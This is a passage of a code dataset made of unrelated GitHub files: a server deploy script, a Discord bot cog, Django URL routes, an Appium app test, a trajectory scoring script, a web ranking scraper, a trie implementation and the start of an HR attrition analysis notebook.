\\\n cd -\\n \\\n sudo rm libiconv* -rf\\n \\\n sudo ldconfig\"\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('install libiconv')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\ndef ln_hiredis():\n cmd = 'sudo ln -s /usr/lib/x86_64-linux-gnu/libhiredis.so.0.10 /usr/lib/x86_64-linux-gnu/libhiredis.so.0.13'\n ret = call(cmd, shell=True)\n return ret\n\n\ndef link_hiredis(ext_dir):\n try:\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.13')):\n return\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.10')):\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n else:\n cmd = 'sudo cp %slibhiredis.so.0.10 /usr/lib/x86_64-linux-gnu' % ext_dir\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('cp libhiredis.so')\n else:\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n isCalc = False\n isCalc = parseArg(sys.argv[1:])\n ext_dir = '../ext/'\n assert_ext(ext_dir + 'ext.json')\n ext_object = load(open(ext_dir + 'ext.json', 'r'))\n create_and_exec_install_shell(ext_object)\n session = Session()\n ret = login(session, ext_object['cloud_login_url'], ext_object['cloud_username'],\n ext_object['cloud_password'], debug=ext_object['debug_mode'])\n if (ret):\n print_info('Login success')\n ret = add_server(\n session, ext_object['cloud_add_server_url'], ext_dir, debug=ext_object['debug_mode'])\n if (ret):\n print_info('Add server success')\n else:\n exit_with_msg('Add server fail')\n else:\n exit_with_msg('Login fail')\n if (isCalc == False):\n link_hiredis(ext_dir)\n dowload_compile_and_install_libiconv()\n","repo_name":"niconical/Script","sub_path":"auto_deploy/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72094806119","text":"import discord\nfrom discord.ext import commands\n\nclass Avatar(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def avatar(self, ctx, member: discord.Member = None):\n if member is None:\n member = ctx.author\n\n embed = discord.Embed(title=f\"Avatar - {member.name}\", color=discord.Color.blue())\n embed.set_image(url=member.avatar_url)\n\n await ctx.send(embed=embed)\n\ndef 
setup(bot):\n    bot.add_cog(Avatar(bot))\n","repo_name":"xxsweatygirlyt/orko-bot","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74513080359","text":"'''\nConverts a string to a binary file.\nUsage: python b.py <input_string> <file_name>\nExample: python b.py \"Hello World\" hello.bin\n'''\n\nimport sys\n\nif len(sys.argv) != 3:\n    print(\"Usage: python b.py <input_string> <file_name>\")\n    sys.exit(1)\n\ninput_string = sys.argv[1]\nfile_name = sys.argv[2]\n\nwith open(file_name, \"wb\") as binary_file:\n    binary_file.write(input_string.encode())","repo_name":"dimitrivlachos/Inky-pHAT-Zero","sub_path":"b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5441628247","text":"# -*- coding: utf-8 -*-\n# @Time    : 18-9-12 1:47 PM\n# @Author  : Gold_py\n# @Site    : \n# @File    : urls.py\n# @Software: PyCharm\nfrom django.conf.urls import url\nfrom .views import IndexViews,User\n\n\nurlpatterns = [\n    # Jump to the mall home page\n    url(r'^$', IndexViews.homeindex,name='home_index' ),\n    # Mall list page\n    url(r'^list/(?P[0-9]+)/$',User.UserList,name='user_list'),\n    # Mall product detail page\n    url(r'^info/(?P[0-9]+)/$',User.UserInfo,name='user_info'),\n    # Mall registration page\n    url(r'^register/$',User.UserRegiser,name='user_regiser'),\n    # Mall login page\n    url(r'^login/$',User.UserLogin,name='user_login'),\n    # Where the captcha image is generated\n    url(r'^passcode/$',User.verifycode,name='user_pass_code'),\n    # Get the phone verification code\n    url(r'^phonecode/$',User.phonecode,name='user_phone_code'),\n    # Log out\n    url(r'^logout/$',User.UserLogOut,name='user_log_out'),\n    # Shopping cart\n    url(r'^bycar/$',User.UserCar,name='user_car'),\n    # Add to cart\n    url(r'^bycar/addgood/$',User.AddGood,name='add_good'),\n    # Update the cart\n    url(r'^bycar/edit_good/$',User.GoodEdit,name='good_edit'),\n    # Delete an item from the cart\n    url(r'^bycar/del_good/$',User.GoodDel,name='good_del'),\n    # Empty the cart\n    url(r'^bycar/flush/$',User.GoodFlushi,name='good_flush'),\n\n\n\n    # The operations below require login authentication\n\n\n\n    # Jump to the order confirmation page\n    url(r'^order/confirm/$',User.OrderMake,name='order_make'),\n    # Create an order\n    url(r'^order/create/$',User.OrderCreate,name='order_create'),\n    # Jump to the payment page\n    url(r'^order/payfor/$',User.OrderPayFor,name='order_pay_for'),\n    # Order status changes to 1, i.e. paid\n    url(r'^order/payfored/$',User.OrderPayFored,name='order_pay_fored'),\n    # Jump to the payment success page\n    url(r'^order/payforsuccess/$',User.OrderPayForSuccess,name='order_pay_for_suscess'),\n    # Jump to the my-orders page\n    url(r'^my/order/orderlist/$',User.MyOrderList,name='my_order_list'),\n\n\n    # Add an address\n    url(r'^user/addaddress/$',User.AddAdderss,name='add_address'),\n    # Address manager\n    url(r'address/manage/$',User.AdderssManage,name='address_manage'),\n    # Delete an address\n    url(r'address/manage/delete/$',User.AdderssManageDelete,name='address_manage_delete'),\n    # Update an address\n    url(r'address/manage/update/$',User.AdderssManageUpdate,name='address_manage_update'),\n\n\n    # Personal center\n    url('^user/mycenter/$',User.MyCenter,name='my_center'),\n    # Update personal info\n    url('^user/mycenter/$',User.MyCenter,name='my_center'),\n\n\n    # Initialize the password\n    url('^init/$',User.Init,name='init'),\n\n\n\n\n    # Cache tests\n    url('^cache1/$',User.cache1,name='cache1'),\n    url('^cache2/$',User.cache2,name='cache2'),\n\n\n\n\n\n]","repo_name":"GITliyanfeng/phone-shop-django","sub_path":"myhome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20637984313","text":"# -*- coding:utf-8 -*-\nimport sys,re,subprocess\nsys.path.append('..')\n\nfrom time import sleep\nimport unittest\nimport lib.public_functions as pubfuc\nimport multiprocessing\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\n\n
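# Join and leave the given room repeatedly (up to 300 rounds) to stress-test joining and leaving\n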
def 加入离开房间(driver,roomid):\n    print(driver.desired_capabilities)\n    devicedriverinfo = driver.desired_capabilities\n    sleep(5)\n    num = 1\n    print(driver.page_source)\n    while num < 301:\n        if num == 1:\n            driver.find_element_by_xpath('//android.widget.EditText[@text=\"会议室名称\"]').send_keys(roomid)  # 'meeting room name' input; the CJK label must match the on-screen text\n            sleep(2)\n        print(f\"Round {num}: {driver} joins and leaves the room\")\n        # io.agora.vcall:id/encryption_key\n        # pubfuc.waittimeout(driver.find_element_by_id(控件信息['JOIN']['id']))\n        if not driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').get_attribute('enabled'):  # the 'Join' button\n            sleep(3)\n        driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').click()\n        sleep(10)\n        if driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\") is None:\n            driver.tap([100,100])\n            sleep(2)\n        driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\").click()\n        sleep(2)\n        num += 1\n\n\nclass AgoraTest(unittest.TestCase):\n\n    def setUp(self):\n        # self.控件信息 = pubfuc.getymlfileinfo()['zego_Android']\n        # the first device is the host\n        devicelist = ['RedMI']\n\n\n        self.sd = pubfuc.StartDriver(devicelist)\n\n        self.proc_list = []\n        是否mac = 'mac' in pubfuc.getcurretsystem()\n\n        pubfuc.cleannodeproc()\n        for i in range(len(self.sd.devicelist)):\n            self.proc_list.append(multiprocessing.Process(target=self.sd.startappiumserver, args=(i,)))\n\n        # print(self.proc_list)\n\n        for pro in self.proc_list:\n            pro.start()\n\n        for pro in self.proc_list:\n            pro.join()\n\n        while len(self.sd.getnodeprocpid()) < len(devicelist):\n            sleep(1)\n\n\n        print(self.sd.getnodeprocpid())\n\n        self.driverlist = []\n        for i in range(len(self.sd.devicelist)):\n            desire_caps = self.sd.realdevice[i]\n            desire_caps['appPackage'] = 'io.agora.vcall'\n            desire_caps['appActivity'] = 'io.agora.vcall.ui.SplashActivity'\n            driver = webdriver.Remote(f\"http://localhost:{self.sd.aport[i]}/wd/hub\", desire_caps)\n            self.driverlist.append(driver)\n            driver.page_source\n        print(self.driverlist)\n\n    def test_001参与者多次加入离开房间(self):\n        procs = []\n        pool = multiprocessing.Pool(processes=len(self.driverlist))\n        for driver in self.driverlist:\n            proc = pool.apply_async(加入离开房间,(driver,'qq',))\n            procs.append(proc)\n        for i in procs:\n            i.get()\n        for i in procs:\n            i.wait()\n\n    def tearDown(self):\n        # quit the device driver\n        for driver in self.driverlist:\n            driver.quit()\n        for proc in self.proc_list:\n            print(proc.is_alive())\n            proc.terminate()\n            # proc.kill()\n        # clean up the node processes; the appium server is started by node\n        pubfuc.cleannodeproc()\n\n\n\n\n\n","repo_name":"zhhy/auto","sub_path":"testcase/agora_testcase.py","file_name":"agora_testcase.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12653924532","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)+'/../../'))\nsys.path.append(os.path.abspath('/grad/1/iida/mytools/python2.7/lib/python2.7/site-packages/'))\n\nimport argparse\nimport math\nimport cv2\nimport numpy as np\nimport csv\nimport glob\nimport yaml\nimport pickle\nfrom multiprocessing import Pool\n\nIN_RECONSTRUCTION_FILENAME = \"tangoCameraPose_floor.json\"\nTRAJECTORY_FILENAME = \"2dtrajectory.csv\"\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='create score map')\n parser.add_argument('test_num_dir', help='path to data dir to be processed')\n parser.add_argument('-p', '--parameter', nargs='?', type=str, default='parameter.yaml', help='load parameter yaml file(default=parameter.yaml)')\n parser.add_argument('-d', '--data', nargs='?', type=str, default='data.yaml', help='load data yaml file(default=data.yaml)')\n parser.add_argument('-f', '--target_floors', nargs='*', type=str, help='target floor names')\n parser.add_argument('-t', '--targets', nargs='*', type=str, help='target data names')\n parser.add_argument('-c', '--config', nargs='?', type=str, help='load config yaml file')\n parser.add_argument('-a', '--plot_all', default=False, action='store_true', help='create for all floor(default=False)')\n parser.add_argument('-o', '--target_data_config', nargs='?', type=str, default=None, help='target data config(default: same as data)')\n parser.add_argument('-j', '--process_num', nargs='?', type=int, default='4', help='process number(default=4)')\n args = parser.parse_args()\n\n # set args\n test_num_dir = args.test_num_dir\n target_floors = args.target_floors\n targets = args.targets\n plot_all = args.plot_all\n process_num = args.process_num\n parameter_fn = os.path.join(test_num_dir, args.parameter)\n data_dir = os.path.join(test_num_dir, os.path.splitext(args.data)[0])\n data_config_fn = os.path.join(test_num_dir, args.data)\n target_data_config_fn = data_config_fn if args.target_data_config is None else os.path.join(test_num_dir, args.target_data_config)\n results_dir = os.path.join(data_dir, 'score')\n\n # logger setting\n log_fn = os.path.join(os.path.join(data_dir), 'log.txt')\n import logging\n logger = logging.getLogger('testLogger')\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('(PID:%(process)d)[%(asctime)s][%(levelname)s] %(message)s')\n fh = logging.FileHandler(log_fn)\n logger.addHandler(fh)\n fh.setFormatter(formatter)\n sh = logging.StreamHandler()\n logger.addHandler(sh)\n sh.setFormatter(formatter)\n logger.info('Start Logging: {}'.format(log_fn))\n # logger setting done\n\n # set parameters\n logger.info('load meta yaml file: {}'.format(parameter_fn))\n with open(parameter_fn, 'r') as f:\n parameter = yaml.load(f)\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n\n pix_per_meter = parameter['setting']['pix_per_meter']\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n align_step = parameter['setting']['align_step']\n align_voxel_size = parameter['setting']['align_voxel_size']\n decimate = parameter['setting']['align_decimate']\n\n fire_threshold = parameter['setting']['fire_threshold']\n good_consistency_threshold = parameter['setting']['good_consistency_threshold']\n\n hit_shot_count_threshold = parameter['setting']['hit_shot_count_threshold']\n floor_voxel_count_threshold = parameter['setting']['floor_voxel_count_threshold']\n\n 
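# limits on how many candidate results / z-slices get saved downstream, judging by the parameter names (not used in this excerpt)\n    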
max_save_num = parameter['setting']['max_save_num']\n max_save_znum = parameter['setting']['max_save_znum']\n\n # load datasets\n logger.info('load target data yaml file: {}'.format(target_data_config_fn))\n with open(target_data_config_fn, 'r') as f:\n data_config = yaml.load(f)\n floorplans_dir = data_config['path']['floorplans']\n datasets_dir = data_config['path']['datasets']\n\n # load target pairs\n target_pairs = {}\n if target_floors is None:\n target_floors = []\n for floor in data_config['floors']:\n if data_config['floors'][floor]['val']:\n target_floors.append(floor)\n if targets is None:\n targets = []\n for dn in data_config['datasets']:\n # if 'target_floor_all' in config['datasets'][dn] and config['datasets'][dn]['target_floor_all']:\n # target_pairs[dn] = target_floors\n # elif 'target_floor' in config['datasets'][dn]:\n # floors = []\n # if config['datasets'][dn]['target_floor'] is None:\n # continue\n # for floor in config['datasets'][dn]['target_floor']:\n # floors.append(floor)\n # target_pairs[dn] = floors\n if data_config['datasets'][dn] is not None and 'target' in data_config['datasets'][dn] and data_config['datasets'][dn]['target']:\n target_pairs[dn] = target_floors\n else:\n for target in targets:\n target_pairs[target] = target_floors\n\n # print target pairs\n for dn in target_pairs:\n logger.info('target pairs: {}'.format(dn))\n for floor in target_pairs[dn]:\n logger.info(' {}'.format(floor))\n\n for data_name in target_pairs:\n target_dir = os.path.join(results_dir, data_name)\n\n tra_fn = os.path.join(datasets_dir, '{}/2dtrajectory.csv'.format(data_name))\n tra_dict = {}\n with open(tra_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n x = int(row[1])\n y = int(row[2])\n z = float(row[4]) * pix_per_meter # z will come in meter\n tra_dict[k] = [x, y, z]\n logger.info('load {} trajectory points from {}'.format(len(tra_dict), tra_fn))\n\n meta_fn = os.path.join(datasets_dir, '{}/meta.yaml'.format(data_name))\n with open(meta_fn, 'r') as f:\n meta = yaml.load(f)\n logger.info('load meta data {}'.format(meta_fn))\n\n for floor_fn in meta['floorplans']:\n target_floor_dir = os.path.join(target_dir, os.path.splitext(floor_fn)[0])\n if not os.path.exists(target_floor_dir):\n logger.info('target floor not found: {}'.format(target_floor_dir))\n continue\n logger.info('target floor: {}'.format(floor_fn))\n\n fp_fn = os.path.join(floorplans_dir, floor_fn)\n fp_img = cv2.imread(fp_fn)\n\n # load score\n score_fn_list = glob.glob(os.path.join(target_floor_dir, 'score/*.csv'))\n score_fn_list.sort()\n score_fn_list = score_fn_list[::decimate]\n logger.info('load {} scores'.format(len(score_fn_list)))\n target_tra_dict = {}\n range_x, range_y, range_z = None, None, None\n score_yxz_dict = {}\n floormask_yxz_dict = {}\n score_map_count = None\n\n ## load score map from csv\n score_map_dict = {}\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n score_map = np.zeros((fp_img.shape[0], fp_img.shape[1], 1), dtype=float)\n # score_map = np.zeros((fp_img.shape[0]//align_voxel_size[1], fp_img.shape[1]//align_voxel_size[0], 1), dtype=float)\n score_map += -1 # for out-range of floormask\n with open(score_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n x = int(row[0])\n y = int(row[1])\n score = float(row[2])\n score_map[int(y-crop_step/2):int(y+crop_step/2), int(x-crop_step/2):int(x+crop_step/2)] = score\n # 
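(voxel-grid-resolution variant, kept for reference) 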
score_map[(y-crop_step/2)//align_voxel_size[1]:(y+crop_step/2)//align_voxel_size[1], (x-crop_step/2)//align_voxel_size[0]:(x+crop_step/2)//align_voxel_size[0]] = score # center to topleft\n score_map_dict[shot_name] = score_map\n logger.info('load score map from csv')\n\n # create score map of each translation(len(range_y)*len(range_x))\n logger.info('start to create score map of each translation')\n # results = [[] for z in range(len(range_z))]\n\n # calc_score\n def calc_score(arg):\n tra_y = arg[0]\n tra_x = arg[1]\n tra_z = arg[2]\n\n # count number of shots which hit floor\n hit_shot_list = []\n count_yx = np.zeros((fp_img.shape[0], fp_img.shape[1]), dtype=int)\n # floor_voxel_count = 0\n floor_voxel_count = 0\n for score_fn in score_fn_list:\n shot_name = os.path.splitext(os.path.basename(score_fn))[0]+'.png'\n if shot_name not in tra_dict:\n\n continue\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = ((xyz[1] + tra_y)//crop_step) * crop_step\n x = ((xyz[0] + tra_x)//crop_step) * crop_step\n z = xyz[2] + tra_z\n if not (-align_step[2]/2 < z < align_step[2]/2):\n continue\n if y < 0 or y >= score_map_dict[shot_name].shape[0] or \\\n x < 0 or x >= score_map_dict[shot_name].shape[1] or \\\n score_map_dict[shot_name][y][x] < 0: # out of range\n continue\n\n if count_yx[y, x] == 0:\n floor_voxel_count += 1\n count_yx[y:y+crop_step, x:x+crop_step] += 1\n hit_shot_list.append(shot_name)\n\n # sum scores for each voxel\n score = 0.0\n fire = []\n c = 0\n for shot_name in hit_shot_list:\n xyz = tra_dict[shot_name]\n # y = (xyz[1] + tra_y) // align_voxel_size[1]\n # x = (xyz[0] + tra_x) // align_voxel_size[0]\n y = int(xyz[1] + tra_y)\n x = int(xyz[0] + tra_x)\n s = score_map_dict[shot_name][y][x]\n if s > fire_threshold:\n fire.append(shot_name)\n score += s/float(count_yx[y][x])\n\n # average\n score /= float(floor_voxel_count)\n\n result = {}\n result['x'] = int(tra_x)\n result['y'] = int(tra_y)\n result['z'] = int(tra_z)\n result['score'] = float(score)\n result['in_floor'] = hit_shot_list\n result['fire'] = fire\n\n return result\n\n # get tra_x, tra_y, tra_z\n tra_floor_fn = os.path.join(datasets_dir, '{}/2dtrajectory_{}.csv'.format(data_name, os.path.splitext(floor_fn)[0]))\n tra_floor_dict = {}\n c = 0\n tra_x = 0\n tra_y = 0\n tra_z = 0\n with open(tra_floor_fn, 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n k = row[0]\n tra_x += int(row[1]) - tra_dict[k][0]\n tra_y += int(row[2]) - tra_dict[k][1]\n tra_z += float(row[4]) * pix_per_meter - tra_dict[k][2]\n c += 1\n tra_x /= c\n tra_y /= c\n tra_z /= c\n logger.info('translation: ({}, {}, {})'.format(tra_x, tra_y, tra_z))\n result = calc_score([tra_y, tra_x, tra_z])\n\n # save results\n logger.info('creating result dict to save')\n out_info_fn = os.path.join(target_floor_dir, 'actual_score.yaml')\n data = {}\n data['actual'] = result\n with open(out_info_fn, 'w') as f:\n f.write(yaml.dump(data, default_flow_style=False))\n\n # plot data\n # load base image\n fp_img = cv2.imread(fp_fn)\n\n trax = int(result['x'])\n tray = int(result['y'])\n\n # plot trajectory\n for shot in score_fn_list: # here will cause error if DECIMATE is different with align info\n shot = os.path.splitext(os.path.basename(shot))[0] + '.png'\n if shot not in tra_dict:\n continue\n x, y = tra_dict[shot][0] + trax, tra_dict[shot][1] + tray\n\n if y in range(fp_img.shape[0]) and x in range(fp_img.shape[1]):\n if shot in result['fire']:\n cv2.circle(fp_img, (x, y), 5, (0, 0, 
255), -1)\n                    elif shot in result['in_floor']:\n                        cv2.circle(fp_img, (x, y), 5, (255, 0, 0), -1)\n                    else:\n                        cv2.circle(fp_img, (x, y), 5, (0, 0, 0), -1)\n\n            # save image file\n            out_img_fn = os.path.join(target_floor_dir, 'actual_{}.png'.format(result['z']))\n            cv2.imwrite(out_img_fn, fp_img)\n            logger.info(\"save {}\".format(out_img_fn))\n            break\n\n","repo_name":"iidango/tangologger","sub_path":"manual_alignment/test/alignment/past_scripts/calc_actual_score.py","file_name":"calc_actual_score.py","file_ext":"py","file_size_in_byte":13435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21375216403","text":"#\n# @lc app=leetcode.cn id=208 lang=python3\n#\n# [208] Implement Trie (Prefix Tree)\n#\n\n# @lc code=start\nclass Trie:\n\n    def __init__(self, val=None, end=True):\n        \"\"\"\n        Initialize your data structure here.\n        \"\"\"\n        self.children = {}\n        self.end = end\n        self.val = val\n\n    def insert(self, word: str) -> None:\n        \"\"\"\n        Inserts a word into the trie.\n        \"\"\"\n        if not word:\n            return\n        if word[0] not in self.children:\n            self.children[word[0]] = Trie(word[0], len(word) == 1)\n        c = self.children[word[0]]\n        if len(word) == 1:\n            c.end = True\n        c.insert(word[1:])\n\n    def search(self, word: str) -> bool:\n        \"\"\"\n        Returns if the word is in the trie.\n        \"\"\"\n        if not word:\n            return True\n        if word[0] not in self.children:\n            return False\n        else:\n            c = self.children[word[0]]\n            if len(word) == 1:\n                return c.end\n            else:\n                return c.search(word[1:])\n\n    def startsWith(self, prefix: str) -> bool:\n        \"\"\"\n        Returns if there is any word in the trie that starts with the given prefix.\n        \"\"\"\n        if not prefix:\n            return True\n        if prefix[0] not in self.children:\n            return False\n        else:\n            c = self.children[prefix[0]]\n            return c.startsWith(prefix[1:])\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n# @lc code=end\n","repo_name":"cuyu/leetcode","sub_path":"208.实现-trie-前缀树.py","file_name":"208.实现-trie-前缀树.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37589624495","text":"import requests\nimport csv\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\ndaum_url = 'https://www.daum.net/'\nresponse = requests.get(daum_url).text\n\ndata = BeautifulSoup(response, 'html.parser')\nrankings = data.select('#mArticle > div.cmain_tmp > div.section_media > div.hotissue_builtin.hide > div.realtime_part > ol > li > div > div:nth-child(1) > span.txt_issue > a') # multiple matches (a list)\n# data.select_one() # a single match\n\n\n# for idx, rank in enumerate(rankings, 1):\n#     print(f'{idx}위 : {rank.text}')\n\n# Build the data into a dictionary\n# result_dict = {}\n# for idx, rank in enumerate(rankings, 1):\n#     result_dict[f'{idx}위'] = rank.text\n# print(result_dict)\n\n# Save the data built above to csv\n# with open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n#     csv_writer = csv.writer(csvfile)\n#     for item, rank in result_dict.items():\n#         csv_writer.writerow([item, rank])\n\n# First, rebuild the data to look like json records\nresult_list = []\nfor idx, rank in enumerate(rankings, 1):\n    result_dict = {'rank': f'{idx}위', 'ranker': rank.text}\n    result_list.append(result_dict)\n# pprint(result_list)\n\n# Use DictWriter with the newly built data\nwith open('daum_rank.csv', 'w', newline='', encoding='utf-8') as csvfile:\n    # Pre-define the field names to save (they must match the dictionaries' key names)\n    fieldnames = ['rank', 'ranker']\n    
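# DictWriter maps each row dict's keys onto these field names\n    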
csv_writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n    # Write the field names at the very top of the csv file\n    csv_writer.writeheader()\n    # Iterate over the list and write each value (content) under its key (csv field)\n    for item in result_list:\n        csv_writer.writerow(item)","repo_name":"jung9156/studies","sub_path":"lecture/python/python_csv/daum_ranking.py","file_name":"daum_ranking.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72177150759","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Background\n\n\n# In[ ]:\n\n\n#McCurr Health Consultancy is an MNC that has thousands of employees spread across the globe. \n#The company believes in hiring the best talent available and retaining them for as long as possible. \n#A huge amount of resources is spent on retaining existing employees through various initiatives. \n#The Head of People Operations wants to bring down the cost of retaining employees. For this, he proposes \n#limiting the incentives to only those employees who are at risk of attrition. As a recently hired Data \n#Scientist in the People Operations Department, you have been asked to identify patterns in characteristics \n#of employees who leave the organization. Also, you have to use this information to predict if an employee \n#is at risk of attrition. This information will be used to target them with incentives.\n\n\n# In[5]:\n\n\n#Objective\n\n\n# In[ ]:\n\n\n#To identify the different factors that drive attrition\n#To build a model to predict if an employee will attrite or not\n\n\n# In[3]:\n\n\n#Dataset Description\n\n\n# In[4]:\n\n\n#The data contains information on employees' demographic details, work-related metrics, and attrition flag.\n\n#EmployeeNumber - Unique Employee Identifier\n#Attrition - Did the employee attrite or not?\n#Age - Age of the employee\n#BusinessTravel - Travel commitments for the job\n#DailyRate - Data description not available\n#Department - Employee's Department\n#DistanceFromHome - Distance from work to home (in KM)\n#Education - Employee's Education. 1-Below College, 2-College, 3-Bachelor, 4-Master, 5-Doctor\n#EducationField - Field of Education\n#EnvironmentSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#Gender - Employee's gender\n#HourlyRate - Data description not available\n#JobInvolvement - 1-Low, 2-Medium, 3-High, 4-Very High\n#JobLevel - Level of job (1 to 5)\n#JobRole - Job Roles\n#JobSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#MaritalStatus - Marital Status\n#MonthlyIncome - Monthly Salary\n#MonthlyRate - Data description not available\n#NumCompaniesWorked - Number of companies worked at\n#Over18 - Whether the employee is over 18 years of age?\n#OverTime - Whether the employee is doing overtime?\n#PercentSalaryHike - The percentage increase in the salary last year\n#PerformanceRating - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#RelationshipSatisfaction - 1-Low, 2-Medium, 3-High, 4-Very High\n#StandardHours - Standard Hours\n#StockOptionLevel - Stock Option Level\n#TotalWorkingYears - Total years worked\n#TrainingTimesLastYear - Number of training sessions attended last year\n#WorkLifeBalance - 1-Low, 2-Good, 3-Excellent, 4-Outstanding\n#YearsAtCompany - Years at Company\n#YearsInCurrentRole - Years in the current role\n#YearsSinceLastPromotion - Years since the last promotion\n#YearsWithCurrManager - Years with the current manager\n#In the real world, you will not find definitions for some of your variables. 
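(For instance, DailyRate, HourlyRate, and MonthlyRate above come with no description.)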
\n#It is the part of the analysis to figure out what they might mean.\n\n#Note\n#Kindly do not run the code cells containing Hyperparameter Tuning using GridSearchCV during the session, \n#since they take considerable time to run.\n\n\n# In[2]:\n\n\n#Importing the libraries and overview of the dataset\n\n\n# In[6]:\n\n\nimport pandas as pd\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\n\n# To scale the data using z-score\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.model_selection import train_test_split\n\n# Algorithms to use\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Metrics to evaluate the model\nfrom sklearn import metrics\n\nfrom sklearn.metrics import confusion_matrix, classification_report, precision_recall_curve,recall_score\n\nfrom sklearn import tree\n\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.ensemble import BaggingClassifier\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n# For tuning the model\nfrom sklearn.model_selection import GridSearchCV\n\n# To ignore warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[7]:\n\n\n#Loading the Dataset\n\n\n# In[8]:\n\n\n# Loading the dataset\ndf = pd.read_excel('/Users/yutaoyan/Desktop/HRemployeeGL/HREmployee.xlsx')\n\n\n# In[9]:\n\n\n# Looking at the first 5 records\ndf.head()\n\n\n# In[10]:\n\n\n#Checking the info of the dataset\n\n\n# In[11]:\n\n\n# Let us see the info of the data\ndf.info()\n\n\n# In[12]:\n\n\n#Observations:\n\n#There are 2940 observations and 34 columns in the dataset.\n#All the columns have 2940 non-null values, i.e., there are no missing values in the data.\n\n\n# In[13]:\n\n\n#Let's check the unique values in each column\n\n\n# In[14]:\n\n\n# Checking the count of unique values in each column\ndf.nunique()\n\n\n# In[15]:\n\n\n#Observations:\n\n#Employee number is an identifier which is unique for each employee and we can drop this column as \n#it would not add any value to our analysis.\n#Over18 and StandardHours have only 1 unique value. These columns will not add any value to our model \n#hence we can drop them.\n#Over18 and StandardHours have only 1 unique value. 
We can drop these columns as they will not add any \n#value to our analysis.\n#On the basis of number of unique values in each column and the data description, we can identify the \n#continuous and categorical columns in the data.\n\n\n#Let's drop the columns mentioned above and define lists for numerical and categorical columns to \n#explore them separately.\n\n\n# In[16]:\n\n\n# Dropping the columns\ndf = df.drop(['EmployeeNumber', 'Over18', 'StandardHours'] , axis = 1)\n\n\n# In[17]:\n\n\n# Creating numerical columns\nnum_cols = ['DailyRate', 'Age', 'DistanceFromHome', 'MonthlyIncome', 'MonthlyRate', 'PercentSalaryHike', 'TotalWorkingYears', \n 'YearsAtCompany', 'NumCompaniesWorked', 'HourlyRate', 'YearsInCurrentRole', 'YearsSinceLastPromotion', \n 'YearsWithCurrManager', 'TrainingTimesLastYear']\n\n# Creating categorical variables\ncat_cols = ['Attrition', 'OverTime', 'BusinessTravel', 'Department', 'Education', 'EducationField', 'JobSatisfaction', 'EnvironmentSatisfaction', \n 'WorkLifeBalance', 